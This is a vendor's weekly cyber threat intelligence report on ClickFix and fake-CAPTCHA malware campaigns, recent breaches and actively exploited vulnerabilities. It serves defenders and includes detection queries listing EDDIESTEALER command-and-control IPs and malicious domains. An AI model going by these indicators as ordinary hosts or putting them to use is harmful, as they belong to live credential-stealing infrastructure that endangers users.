Cyber Threat Intelligence Report

This week, we briefed our clients on new research that shows ClickFix & Fake CAPTCHA are thriving. We also discussed recent breaches that made the news.

 KEY TAKEAWAYS 

• Cyber-extortion group Scattered Spider campaign against retail industry shifts focus to the U.S. Learn their TTPs and how to protect against them.

• Critical vulnerabilities in Fortinet, Cisco, SonicWall, Google Chrome, and ASUS. Patch now!

ClickFix & Fake CAPTCHA Continue To Thrive

ClickFix & Fake CAPTCHA is an increasingly common technique used by threat actors to gain initial access. Threat actors either compromised legitimate websites or host their own sites that prompt the user to copy malicious code and trick them into running it on their system.

Fig. 1: Fake CAPTCHA prompt | Source: Elastic Security

This technique is commonly used to deliver either infostealer malware or loader malware that further infects the victim with additional malicious payloads such as ransomware.

Fake CAPTCHA Pushes EDDIESTEALER

New research from Elastic Security details a new infostealer written in Rust being distributed via fake CAPTCHA sites called EDDIESTEALER. This infostealer targets user data including credentials, browser information, and cryptocurrency wallets. One notable detail in Elastic's research is EDDIESTEALER's ability to extract data from web browsers. The malware authors implemented a Rust-based version of ChromeKatz, a utility for dumping sensitive data from memory of Chromium-based browsers. This allows the malware to harvest data such as cookies and session data. Elastic's research also shows EDDIESTEALERS's ability to manipulate Chrome browsers into dumping plaintext credentials stored in its Password Manager.

Beyond ClickFix

Researchers at TrendMicro detailed a new campaign that is delivering Vidar and StealC infostealer malware via TikTok videos. The delivery method is a similar concept to ClickFix, where the user is tricked into running malicious code themselves via the Windows Run prompt. However, instead of a fake error message or fake CAPTCHA page that give the user instructions, AI-generated videos on TikTok convince users to run the malicious code claiming it will either activate or unlock premium features in software. The end result is the same; the user is tricked into running malicious PowerShell code that downloads malware onto the victim's computer.

How to Protect Your Organization

• User Awareness Training - ClickFix and Fake CAPTCHA are social engineering attacks. Their success lies in their ability to trick the user. The best way to prevent this is to train and educate users on how these attacks operate.
• Disable Windows Run Command - Most users in an organization should not need the ability to run commands or code on their workstations. The Windows Run command can be disabled by administrators via GPO. Details for this process can be found here.
• Deploy up-to-date EDR - All endpoints should have fully patched and up-to-date EDR tools. This will help detect and block infostealer malware that users do eventually download.
• Network Detection - Network detection tools such as PacketWatch can detect traffic to suspicious download sites and command & control (C2) traffic of any malware that evades EDR protections.
• Restrict Web Traffic – Consider blocking traffic to social media and other content-sharing websites for workstations. Ideally, only web traffic to work-related sites should be allowed.

Find it in PacketWatch

PacketWatch query for EDDIESTEALER C2 IPs:

\*.ip:(45.144.53.145 OR 84.200.154.47)

PacketWatch query for EDDIESTEALER domain infrastructure:

http.host:(shiglimugli.xyz OR xxxivi.com OR llll.fit OR plasetplastik.com OR militrex.wiki)

Resources:

• https://www.elastic.co/security-labs/eddiestealer
  
• https://www.trendmicro.com/en_us/research/25/e/tiktok-videos-infostealers.html
  
• https://github.com/Meckazin/ChromeKatz
  
• https://thehackernews.com/2025/05/eddiestealer-malware-uses-clickfix.html
  
• https://www.thewindowsclub.com/enable-or-disable-run-command-winr-box-in-windows-10
  
• https://expel.com/blog/following-the-spiders-investigating-lactrodectus-malware/
  
• https://thehackernews.com/2025/05/hackers-use-tiktok-videos-to-distribute.html

Notable Data Breaches

ConnectWise

On May 28, ConnectWise disclosed they observed suspicious activity they believe is tied to a nation-state actor in their ScreenConnect cloud environment. The notification states it impacted only a small amount of customers, and that each impacted customer has been notified directly by ConnectWise. While the advisory did not disclose exactly how the intrusion happened, it does contain several mentions of a patch they released on April 24 for CVE-2025-3935. Administrators are advised to ensure they patch ScreenConnect to version 25.2.4 or higher. PacketWatch will continue to monitor this incident for further details.

LexisNexis

LexisNexis Risk Solutions, a data analytics company that is used by the majority of Fortune 500 companies, disclosed that threat actors stole PII data for over 364,000 individuals in December 2024. The PII data includes name, phone number, email address, postal address, social security number, driver's license number and date of birth. Investigation of the breach shows the data was harvested from GitHub (3rd party infrastructure) and not LexisNexis itself.

Resources:

• https://www.connectwise.com/company/trust/advisories
  
• https://thehackernews.com/2025/05/connectwise-hit-by-cyberattack-nation.html
  
• https://www.bleepingcomputer.com/news/security/data-broker-lexisnexis-discloses-data-breach-affecting-364-000-people/

Vulnerability Roundup

Chinese Espionage Group Actively Exploiting Ivanti EPMM

A pair of medium-severity vulnerabilities in Ivanti Endpoint Manager Mobile (EPMM) version 12.5.0.0 and earlier was disclosed on May 15. Tracked as CVE-2025-4427 and CVE-2025-4428, these vulnerabilities can be chained together to achieve unauthenticated remote code execution (RCE). Research from EclecticIQ show these vulnerabilities were actively exploited as 0-days by a Chinese espionage group tracked as UNC5221. Proof-of-concept exploit code for these vulnerabilities is also in the wild. Administrators are urged to patch as soon as possible. As Ivanti products are heavily targeted by threat actors due to a multitude of high and critical severity vulnerabilities in recent years, if organizations choose to continue using this product, they should be heavily monitored for unusual activity.

• https://blog.eclecticiq.com/china-nexus-threat-actor-actively-exploiting-ivanti-endpoint-manager-mobile-cve-2025-4428-vulnerability
  
• https://thehackernews.com/2025/05/chinese-hackers-exploit-ivanti-epmm.html
  
• https://thehackernews.com/2025/05/ivanti-patches-epmm-vulnerabilities.html
  
• https://www.ivanti.com/blog/epmm-security-update

CISA KEV Additions

The following vulnerabilities were added to CISA's Known Exploited Vulnerabilities Catalog in the last 2 weeks:

• CVE-2023-38950 - ZKTeco BioTime Path Traversal Vulnerability
• CVE-2024-27443 - Synacor Zimbra Collaboration Suite (ZCS) Cross-Site Scripting (XSS) Vulnerability
• CVE-2025-27920 - Srimax Output Messenger Directory Traversal Vulnerability
• CVE-2024-11182 - MDaemon Email Server Cross-Site Scripting (XSS) Vulnerability
• CVE-2025-4428 - Ivanti Endpoint Manager Mobile (EPMM) Code Injection Vulnerability
• CVE-2025-4427 - Ivanti Endpoint Manager Mobile (EPMM) Authentication Bypass Vulnerability
• CVE-2025-4632 - Samsung MagicINFO 9 Server Path Traversal Vulnerability

This report is provided FREE to the cybersecurity community.

Visit our Cyber Threat Intelligence Blog for additional reports.

Subscribe to be notified of future Reports:

NOTE
We have enhanced our report with data from SOCRadar. You may need to register to view their threat intelligence content.

DISCLAIMER
Kindly be advised that the information contained in this article is presented with no final evaluation and should be considered raw data. The sole purpose of this information is to provide situational awareness based on the currently available knowledge. We recommend exercising caution and conducting further research as necessary before making any decisions based on this information.